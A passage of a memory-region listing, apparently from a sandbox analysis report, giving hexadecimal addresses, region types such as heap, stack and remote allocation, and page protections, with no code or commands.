page read and write
63D0000
trusted library allocation
page read and write
3431F9000
stack
page read and write
4FB000
stack
page read and write
7990000
trusted library allocation
page read and write
1FA58DF4000
heap
page read and write
67A0000
trusted library allocation
page read and write
6460000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
7FFC9DCF0000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
1FA59814000
heap
page read and write
1B68608C000
heap
page read and write
3350000
trusted library allocation
page read and write
2D71000
trusted library allocation
page read and write
22F0000
unkown
page readonly
6A60000
trusted library allocation
page read and write
68D0000
trusted library allocation
page read and write
570957C000
stack
page read and write
63C0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page execute and read and write
B5BE000
heap
page read and write
1FA58D40000
heap
page read and write
6AA0000
trusted library allocation
page read and write
2541AE79000
heap
page read and write
6A60000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
1FA58CAD000
heap
page read and write
1F94000
trusted library allocation
page read and write
1BF9F5D0000
heap
page read and write
79A0000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
43F0000
trusted library allocation
page read and write
ACFA07D000
stack
page read and write
2D50000
heap
page read and write
1FA58C6C000
heap
page read and write
7B00000
trusted library allocation
page read and write
3360000
trusted library allocation
page execute and read and write
3350000
trusted library allocation
page read and write
67C0000
trusted library allocation
page read and write
2D10000
heap
page read and write
22EC045B000
heap
page read and write
6AB6000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
6400000
trusted library allocation
page read and write
2541AF13000
heap
page read and write
67A0000
trusted library allocation
page read and write
6AA6000
trusted library allocation
page read and write
22F0000
unkown
page readonly
25458A02000
trusted library allocation
page read and write
29E0000
unkown
page readonly
1FA58D36000
heap
page read and write
699E000
trusted library allocation
page read and write
1FA58C9C000
heap
page read and write
6A60000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
1FA58CAE000
heap
page read and write
1FA58D1E000
heap
page read and write
1FA58CFF000
heap
page read and write
DD32000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
4306000
trusted library allocation
page read and write
698F000
trusted library allocation
page read and write
3070000
heap
page read and write
7A90000
unkown
page read and write
7840000
trusted library allocation
page read and write
401000
unkown
page execute read
6A55000
trusted library allocation
page read and write
2FD7000
stack
page read and write
B2C0000
trusted library allocation
page read and write
B144000
unkown
page readonly
1FA58C5E000
heap
page read and write
35AD000
trusted library allocation
page execute and read and write
6AA0000
trusted library allocation
page read and write
1FA58C96000
heap
page read and write
1FA58D0E000
heap
page read and write
6AA0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
63D0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
1FA58C9B000
heap
page read and write
87C0000
trusted library allocation
page read and write
29B0000
remote allocation
page read and write
41F3000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
1FA58CF4000
heap
page read and write
6AA7000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
3090000
heap
page read and write
63E0000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
7BB0000
trusted library allocation
page read and write
2C8C000
stack
page read and write
67F0000
trusted library allocation
page read and write
32D0000
remote allocation
page read and write
6A50000
unkown
page read and write
2B30000
heap
page read and write
4154000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
185E824F000
heap
page read and write
185E825A000
heap
page read and write
67A0000
trusted library allocation
page read and write
1FA58D46000
heap
page read and write
68E0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
7FFC9D9E3000
trusted library allocation
page read and write
1E99CC3E000
heap
page read and write
6AA0000
trusted library allocation
page read and write
D0000
heap
page read and write
3350000
trusted library allocation
page read and write
1B130DA0000
heap
page read and write
17C000
stack
page read and write
3DB0000
trusted library allocation
page read and write
6AA5000
trusted library allocation
page read and write
6A55000
trusted library allocation
page read and write
15DFD671000
heap
page read and write
7810000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
59BFFEF000
stack
page read and write
1B116C10000
heap
page read and write
6840000
trusted library allocation
page read and write
7C20000
trusted library allocation
page read and write
41283FC000
stack
page read and write
2980000
heap
page read and write
6A60000
trusted library allocation
page read and write
1BF9F660000
heap
page read and write
1B11A106000
trusted library allocation
page read and write
2890000
heap
page read and write
7940000
trusted library allocation
page read and write
D9035FE000
stack
page read and write
7960000
trusted library allocation
page read and write
69DD000
trusted library allocation
page read and write
1FA59D90000
remote allocation
page read and write
6AA0000
trusted library allocation
page read and write
131D000
stack
page read and write
291E000
stack
page read and write
77F0000
trusted library allocation
page read and write
1D4FEE5B000
heap
page read and write
34367F000
stack
page read and write
6850000
trusted library allocation
page read and write
D8CF000
stack
page read and write
4345000
trusted library allocation
page read and write
43A4000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
3E2E000
stack
page read and write
2998000
heap
page read and write
2040000
heap
page read and write
3330000
heap
page read and write
1B685F10000
heap
page read and write
67E0000
trusted library allocation
page read and write
1FA59758000
heap
page read and write
1B686B00000
heap
page read and write
6800000
trusted library allocation
page read and write
2F9C000
stack
page read and write
7820000
trusted library allocation
page read and write
67F4000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
6A50000
unkown
page read and write
1FA58D9B000
heap
page read and write
3340000
trusted library allocation
page execute and read and write
7A30000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
7AC6000
unkown
page read and write
63C0000
trusted library allocation
page read and write
6880000
trusted library allocation
page read and write
63E6000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
25458102000
heap
page read and write
2084000
trusted library allocation
page read and write
2D60000
heap
page read and write
7A05000
trusted library allocation
page read and write
6AA5000
trusted library allocation
page read and write
25457F90000
heap
page read and write
63E4000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
765C000
stack
page read and write
7960000
trusted library allocation
page read and write
154531D0000
remote allocation
page read and write
1BF9F640000
heap
page read and write
6A60000
trusted library allocation
page read and write
67B0000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
2541AF00000
heap
page read and write
1FA58D14000
heap
page read and write
1FA58DAB000
heap
page read and write
18880200000
heap
page read and write
6780000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
313E000
stack
page read and write
283F000
stack
page read and write
3337000
heap
page read and write
785E000
trusted library allocation
page read and write
2541AE54000
heap
page read and write
77F0000
trusted library allocation
page read and write
1B118781000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
185E827E000
heap
page read and write
7A05000
trusted library allocation
page read and write
1B11A244000
trusted library allocation
page read and write
2540000
unkown
page readonly
6A60000
unkown
page read and write
6AA0000
trusted library allocation
page read and write
69B3000
trusted library allocation
page read and write
1FA58DA9000
heap
page read and write
4F79000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
7B70000
trusted library allocation
page read and write
6AA8000
trusted library allocation
page read and write
1FA58CD1000
heap
page read and write
1FA58D5E000
heap
page read and write
7BA0000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
287F000
stack
page read and write
1EA3000
trusted library allocation
page read and write
59BFF2E000
stack
page read and write
67A0000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
1FA58DB8000
heap
page read and write
1CD0D7C000
stack
page read and write
6965000
trusted library allocation
page read and write
6992000
trusted library allocation
page read and write
9D000
stack
page read and write
E06000
unkown
page write copy
15DFD648000
heap
page read and write
B573000
heap
page read and write
7760000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
6A69000
trusted library allocation
page read and write
305D000
stack
page read and write
27F0000
remote allocation
page read and write
7BD5000
trusted library allocation
page read and write
427000
unkown
page readonly
6A60000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
1B685F00000
heap
page read and write
1FA5980E000
heap
page read and write
15DFF002000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
4E2000
stack
page read and write
1FA59602000
heap
page read and write
33E0000
trusted library allocation
page read and write
67D0000
trusted library allocation
page read and write
1BF9F70B000
heap
page read and write
1B686BAE000
heap
page read and write
15DFD5C0000
trusted library allocation
page read and write
6A61000
trusted library allocation
page read and write
1F93000
trusted library allocation
page read and write
1FA58C66000
heap
page read and write
1D4FEE02000
heap
page read and write
6AA0000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
6A60000
unkown
page read and write
3350000
trusted library allocation
page read and write
6880000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
2540000
unkown
page readonly
3F2E000
stack
page read and write
7FFC9DBD0000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
59C0577000
stack
page read and write
7980000
trusted library allocation
page read and write
3C9D000
stack
page read and write
69D9000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
1FA58C7F000
heap
page read and write
1B11A4A0000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
6A50000
unkown
page read and write
63AB000
trusted library allocation
page read and write
2310000
unkown
page read and write
2B00000
trusted library allocation
page read and write
1B11A24C000
trusted library allocation
page read and write
6400000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
416B000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
7BB0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6AA000
heap
page read and write
1FA58C8C000
heap
page read and write
15DFD689000
heap
page read and write
1B686B02000
heap
page read and write
2500000
remote allocation
page read and write
6AB0000
trusted library allocation
page read and write
D78D000
stack
page read and write
7850000
trusted library allocation
page read and write
29BE000
stack
page read and write
1FA58D34000
heap
page read and write
8F5D87E000
stack
page read and write
6AA0000
trusted library allocation
page read and write
363E000
stack
page read and write
77D5000
trusted library allocation
page read and write
1017A000
direct allocation
page read and write
2AE0000
unkown
page read and write
696B000
trusted library allocation
page read and write
34337F000
stack
page read and write
6A50000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
43D9000
trusted library allocation
page read and write
6928000
trusted library allocation
page read and write
6AA7000
trusted library allocation
page read and write
1FA58C72000
heap
page read and write
EF5E77B000
stack
page read and write
22EC0502000
heap
page read and write
1FA58D31000
heap
page read and write
6780000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
7970000
trusted library allocation
page read and write
419F000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
313F000
stack
page read and write
6A50000
trusted library allocation
page read and write
185E827B000
heap
page read and write
57092FC000
stack
page read and write
1FA58D41000
heap
page read and write
6A60000
trusted library allocation
page read and write
1B119BAD000
trusted library allocation
page read and write
6A55000
unkown
page read and write
6A60000
unkown
page read and write
1E99CCBA000
heap
page read and write
2AE0000
unkown
page readonly
6A60000
trusted library allocation
page read and write
7FFC9DB81000
trusted library allocation
page read and write
1B1312F0000
heap
page read and write
252D000
stack
page read and write
1B686BD2000
heap
page read and write
79C0000
trusted library allocation
page read and write
1B11A20F000
trusted library allocation
page read and write
67C0000
trusted library allocation
page read and write
1FA58D90000
heap
page read and write
6790000
trusted library allocation
page read and write
B220000
trusted library allocation
page read and write
25458013000
heap
page read and write
250000
heap
page read and write
65E6000
heap
page read and write
63F0000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
1FA58D85000
heap
page read and write
1CD0A7E000
stack
page read and write
691A000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
1FA58D43000
heap
page read and write
7990000
trusted library allocation
page read and write
1FA58D3E000
heap
page read and write
7C10000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
1FA58C53000
heap
page read and write
1FA58DB3000
heap
page read and write
7830000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
3410000
heap
page read and write
6AA0000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
2B20000
heap
page read and write
6560000
trusted library allocation
page read and write
59C027E000
stack
page read and write
7B90000
trusted library allocation
page read and write
15DFD658000
heap
page read and write
6A56000
trusted library allocation
page read and write
6A60000
unkown
page read and write
6757000
trusted library allocation
page read and write
28E0000
heap
page read and write
3150000
heap
page read and write
15DFD5F0000
remote allocation
page read and write
6AA0000
trusted library allocation
page read and write
185E8200000
heap
page read and write
6A60000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
29E0000
unkown
page readonly
2940000
remote allocation
page read and write
28E0000
heap
page read and write
6A60000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6A55000
trusted library allocation
page read and write
3D10000
trusted library allocation
page read and write
6A5E000
trusted library allocation
page read and write
439A000
trusted library allocation
page read and write
63E7000
trusted library allocation
page read and write
1B11B6F6000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
1FA58DCF000
heap
page read and write
4267000
trusted library allocation
page read and write
1FA5981F000
heap
page read and write
63D0000
trusted library allocation
page read and write
24DB000
stack
page read and write
2B68000
heap
page read and write
6790000
trusted library allocation
page read and write
67F0000
trusted library allocation
page read and write
6880000
trusted library allocation
page read and write
6AA5000
trusted library allocation
page read and write
1FA58DBC000
heap
page read and write
6AA7000
trusted library allocation
page read and write
2550000
unkown
page read and write
79A0000
trusted library allocation
page read and write
3750000
heap
page read and write
785B000
trusted library allocation
page read and write
2DA0000
heap
page read and write
6750000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
6760000
trusted library allocation
page read and write
63C7000
trusted library allocation
page read and write
1FA58D8A000
heap
page read and write
D9032FE000
stack
page read and write
3350000
trusted library allocation
page read and write
5708FFB000
stack
page read and write
415F000
trusted library allocation
page read and write
7FFC9DC15000
trusted library allocation
page read and write
B5BE000
heap
page read and write
7A05000
trusted library allocation
page read and write
67B0000
trusted library allocation
page read and write
1E99CC29000
heap
page read and write
7960000
trusted library allocation
page read and write
420000
unkown
page write copy
79F0000
trusted library allocation
page read and write
185E8230000
heap
page read and write
1FA58C7D000
heap
page read and write
41B000
unkown
page readonly
444F000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
7BB5000
trusted library allocation
page read and write
1FA58D49000
heap
page read and write
DE6C000
stack
page read and write
7810000
trusted library allocation
page read and write
2FCE000
stack
page read and write
410C000
trusted library allocation
page read and write
6AA5000
trusted library allocation
page read and write
185E8110000
heap
page read and write
15DFD662000
heap
page read and write
6400000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
1B130EE2000
heap
page read and write
7820000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
1FA59820000
heap
page read and write
67C0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
B56B000
heap
page read and write
67C0000
trusted library allocation
page read and write
39C000
stack
page read and write
1B686029000
heap
page read and write
570917E000
stack
page read and write
63C0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
7960000
trusted library allocation
page read and write
570947B000
stack
page read and write
1476000
unkown
page write copy
7679000
trusted library allocation
page read and write
4FA8000
trusted library allocation
page read and write
7950000
trusted library allocation
page read and write
1FA58D8C000
heap
page read and write
69A5000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
6965000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
6780000
trusted library allocation
page execute and read and write
1B686091000
heap
page read and write
1E99D470000
trusted library allocation
page read and write
1B130E82000
heap
page read and write
6830000
trusted library allocation
page read and write
1E99CC6E000
heap
page read and write
6AB0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
2AD0000
unkown
page readonly
35A0000
heap
page read and write
7520000
trusted library allocation
page read and write
1FA58DFA000
heap
page read and write
6AA0000
trusted library allocation
page read and write
2F30000
heap
page read and write
6AA0000
trusted library allocation
page read and write
29B0000
heap
page read and write
1FA58CCB000
heap
page read and write
347A000
heap
page read and write
6790000
trusted library allocation
page read and write
1FA58CA8000
heap
page read and write
7A00000
trusted library allocation
page read and write
6460000
trusted library allocation
page read and write
2F2E000
stack
page read and write
1FA5975B000
heap
page read and write
6AA0000
trusted library allocation
page read and write
650E000
stack
page read and write
63C0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
6A64000
trusted library allocation
page read and write
1B11B712000
trusted library allocation
page read and write
1FA58D11000
heap
page read and write
7970000
trusted library allocation
page execute and read and write
6A60000
unkown
page read and write
6A60000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
6920000
trusted library allocation
page read and write
1B130D97000
heap
page execute and read and write
1FA58C88000
heap
page read and write
6A60000
trusted library allocation
page read and write
1FA59722000
heap
page read and write
6790000
trusted library allocation
page read and write
1B11A0A7000
trusted library allocation
page read and write
7FFC9D9EC000
trusted library allocation
page read and write
76D0000
trusted library allocation
page read and write
308F000
stack
page read and write
6A50000
unkown
page read and write
6AA0000
trusted library allocation
page read and write
67D0000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
1FA59815000
heap
page read and write
25457FF0000
heap
page read and write
4FA000
heap
page read and write
2FBE000
stack
page read and write
63F0000
trusted library allocation
page read and write
6AB5000
trusted library allocation
page read and write
87C8000
trusted library allocation
page read and write
1FA58CBD000
heap
page read and write
6780000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
34C7000
heap
page read and write
6790000
trusted library allocation
page read and write
1B118CE1000
trusted library allocation
page read and write
28DD000
stack
page read and write
68D0000
trusted library allocation
page execute and read and write
69AB000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
31E0000
heap
page read and write
1B686C30000
heap
page read and write
1B686BCA000
heap
page read and write
154531D0000
remote allocation
page read and write
1FA58CB4000
heap
page read and write
1D4FEE00000
heap
page read and write
422000
unkown
page write copy
7665000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
2860000
heap
page read and write
67A0000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
619CDFE000
stack
page read and write
7820000
trusted library allocation
page read and write
3350000
trusted library allocation
page read and write
4120000
trusted library allocation
page read and write
79D0000
trusted library allocation
page read and write
7844000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
695C000
trusted library allocation
page read and write
3610000
heap
page read and write
B55F000
heap
page read and write
147A000
unkown
page write copy
67A0000
trusted library allocation
page read and write
13D000
stack
page read and write
6A40000
trusted library allocation
page read and write
1B11B750000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
185E826D000
heap
page read and write
1FA58C23000
heap
page read and write
6790000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
2C4E67E000
stack
page read and write
3436FF000
stack
page read and write
1FA58D07000
heap
page read and write
6934000
trusted library allocation
page read and write
185E8302000
heap
page read and write
6AA0000
trusted library allocation
page read and write
1B6861B9000
heap
page read and write
1CD0B7E000
stack
page read and write
2240000
heap
page read and write
4A4000
stack
page read and write
1B11B71C000
trusted library allocation
page read and write
65E1000
heap
page read and write
6AA0000
trusted library allocation
page read and write
6AA0000
unkown
page read and write
7530000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
D90327E000
stack
page read and write
7660000
trusted library allocation
page read and write
63F1000
trusted library allocation
page read and write
1B11A082000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
D07F000
stack
page read and write
6780000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7B5E000
stack
page read and write
298C000
stack
page read and write
6A60000
trusted library allocation
page read and write
1B1191AD000
trusted library allocation
page read and write
6A67000
trusted library allocation
page read and write
2AE0000
unkown
page read and write
1FA58CCE000
heap
page read and write
6A60000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
2D8E000
stack
page read and write
6A5A000
unkown
page read and write
1FA58C9D000
heap
page read and write
7960000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
32D0000
remote allocation
page read and write
7950000
trusted library allocation
page read and write
1FA58C91000
heap
page read and write
1B116CE5000
heap
page read and write
6A60000
unkown
page read and write
330E000
stack
page read and write
6AB0000
trusted library allocation
page read and write
7FFC9DCC0000
trusted library allocation
page read and write
1FA58CC4000
heap
page read and write
6AA5000
trusted library allocation
page read and write
1B118CB0000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
1FA58D5C000
heap
page read and write
1B686C23000
heap
page read and write
3B0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
2BDE000
stack
page read and write
1B11B3D7000
trusted library allocation
page read and write
7776000
trusted library allocation
page read and write
6A66000
trusted library allocation
page read and write
67C0000
trusted library allocation
page read and write
1B686C00000
heap
page read and write
7A00000
trusted library allocation
page read and write
695C000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
1FA58D6F000
heap
page read and write
68A0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
27F0000
remote allocation
page read and write
1FA59813000
heap
page read and write
2B10000
heap
page read and write
67A0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
2AD0000
unkown
page readonly
2B79000
heap
page read and write
1B1187A0000
trusted library allocation
page read and write
766C000
trusted library allocation
page read and write
1B686C36000
heap
page read and write
1FA58D61000
heap
page read and write
120000
heap
page read and write
185E8229000
heap
page read and write
258000
heap
page read and write
67A8000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
7810000
trusted library allocation
page read and write
2C40000
unkown
page read and write
1FA58D1B000
heap
page read and write
3350000
trusted library allocation
page read and write
15DFD653000
heap
page read and write
29D0000
heap
page read and write
7A00000
trusted library allocation
page read and write
6AA5000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
41B000
unkown
page readonly
7540000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
3C0000
heap
page read and write
5CC09FF000
stack
page read and write
1FA58CE5000
heap
page read and write
7950000
trusted library allocation
page read and write
10B54000
direct allocation
page read and write
7990000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
6A50000
unkown
page read and write
2E0A000
heap
page read and write
63C0000
trusted library allocation
page read and write
1FA58CFE000
heap
page read and write
1B116B80000
heap
page read and write
1FA58CB2000
heap
page read and write
79F0000
trusted library allocation
page read and write
1B686043000
heap
page read and write
1B118F58000
trusted library allocation
page read and write
1D4FF602000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
6AA5000
trusted library allocation
page read and write
6A00000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
59C12CB000
stack
page read and write
1FA58CC9000
heap
page read and write
B5C8000
heap
page read and write
1FA58DD4000
heap
page read and write
2B79000
heap
page read and write
1B686B54000
heap
page read and write
4391000
trusted library allocation
page read and write
1FA58D6D000
heap
page read and write
6A63000
trusted library allocation
page read and write
7FFC9DC70000
trusted library allocation
page read and write
4352000
trusted library allocation
page read and write
1B118CB0000
trusted library allocation
page read and write
D10000
unkown
page readonly
27F0000
remote allocation
page read and write
CD30000
heap
page read and write
63D0000
trusted library allocation
page read and write
1BF9F6D5000
heap
page read and write
15DFEFA0000
trusted library allocation
page read and write
6790000
trusted library allocation
page read and write
1FA58D68000
heap
page read and write
6790000
trusted library allocation
page read and write
1FA58DAE000
heap
page read and write
67A1000
trusted library allocation
page read and write
254588A0000
remote allocation
page read and write
2AD0000
unkown
page readonly
6A60000
trusted library allocation
page read and write
67C0000
trusted library allocation
page read and write
1FA58D6B000
heap
page read and write
79D0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
B606000
heap
page read and write
7AB0000
trusted library allocation
page read and write
1FA58D7B000
heap
page read and write
1B130F4C000
heap
page read and write
6999000
trusted library allocation
page read and write
7A00000
trusted library allocation
page read and write
1FA58CF7000
heap
page read and write
ACFA57F000
stack
page read and write
6A60000
trusted library allocation
page read and write
63D0000
trusted library allocation
page read and write
2C40000
unkown
page read and write
259E000
stack
page read and write
D68C000
stack
page read and write
7D0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63D0000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
154530A0000
heap
page read and write
1FA58C70000
heap
page read and write
6AA0000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
6A50000
unkown
page read and write
6AA0000
trusted library allocation
page read and write
1FA58C62000
heap
page read and write
67C0000
trusted library allocation
page read and write
2E70000
heap
page read and write
7960000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
7962000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
6A55000
trusted library allocation
page read and write
6A6C000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
1FA58D2F000
heap
page read and write
7B40000
trusted library allocation
page read and write
7730000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
1F80000
trusted library allocation
page read and write
326D000
stack
page read and write
2E2A000
heap
page read and write
6AA0000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
B5D3000
heap
page read and write
22EC0429000
heap
page read and write
7960000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
63E7000
trusted library allocation
page read and write
42E6000
trusted library allocation
page read and write
3390000
heap
page read and write
1B128CF0000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
67E0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
1FA58C7B000
heap
page read and write
67B0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
63E0000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
1FA58D56000
heap
page read and write
63C8000
trusted library allocation
page read and write
7AC0000
trusted library allocation
page read and write
76F0000
trusted library allocation
page read and write
2540000
unkown
page readonly
1FA58C81000
heap
page read and write
337F000
stack
page read and write
68E0000
trusted library allocation
page read and write
25DE000
stack
page read and write
18880190000
heap
page read and write
2D3B000
heap
page read and write
7B50000
trusted library allocation
page read and write
6AA6000
trusted library allocation
page read and write
6ED000
heap
page read and write
15DFD430000
heap
page read and write
6A60000
trusted library allocation
page read and write
1B1187A0000
heap
page execute and read and write
30000
heap
page read and write
1B11B411000
trusted library allocation
page read and write
283E000
stack
page read and write
6AA0000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
41B3000
trusted library allocation
page read and write
1B686043000
heap
page read and write
7820000
trusted library allocation
page read and write
68D0000
trusted library allocation
page read and write
68E0000
trusted library allocation
page read and write
41BE000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
2310000
unkown
page read and write
7990000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
1FA59745000
heap
page read and write
79B0000
trusted library allocation
page read and write
B60B000
heap
page read and write
65FB000
heap
page read and write
2E4F000
stack
page read and write
7990000
trusted library allocation
page read and write
1FA58DC8000
heap
page read and write
15DFD602000
heap
page read and write
25CE000
unkown
page read and write
67A0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
2C4E4FD000
stack
page read and write
6AA0000
trusted library allocation
page read and write
3360000
trusted library allocation
page read and write
185E823A000
heap
page read and write
1CD067C000
stack
page read and write
6780000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
185E8232000
heap
page read and write
6AA0000
trusted library allocation
page read and write
63D3000
trusted library allocation
page read and write
AEE0000
heap
page read and write
635D000
stack
page read and write
63DC000
trusted library allocation
page read and write
422000
unkown
page write copy
7A95000
trusted library allocation
page read and write
1FA58DFD000
heap
page read and write
7FFC9DC30000
trusted library allocation
page read and write
82F267B000
stack
page read and write
67A0000
trusted library allocation
page read and write
367A000
heap
page read and write
7660000
trusted library allocation
page read and write
AAD4000
unkown
page readonly
2C6E000
unkown
page read and write
7855000
trusted library allocation
page read and write
76F0000
trusted library allocation
page read and write
6AA5000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
2C20000
heap
page read and write
29AE000
stack
page read and write
63D0000
trusted library allocation
page read and write
2530000
unkown
page readonly
6A50000
trusted library allocation
page read and write
63D0000
trusted library allocation
page read and write
1B118CB0000
trusted library allocation
page read and write
1B118640000
trusted library allocation
page read and write
1FA58CE4000
heap
page read and write
6AA0000
trusted library allocation
page read and write
3DC000
stack
page read and write
6A65000
trusted library allocation
page read and write
6BA000
heap
page read and write
79A0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
67C4000
trusted library allocation
page read and write
2FC0000
heap
page read and write
6AB0000
trusted library allocation
page read and write
6934000
trusted library allocation
page read and write
412C000
trusted library allocation
page read and write
32AB000
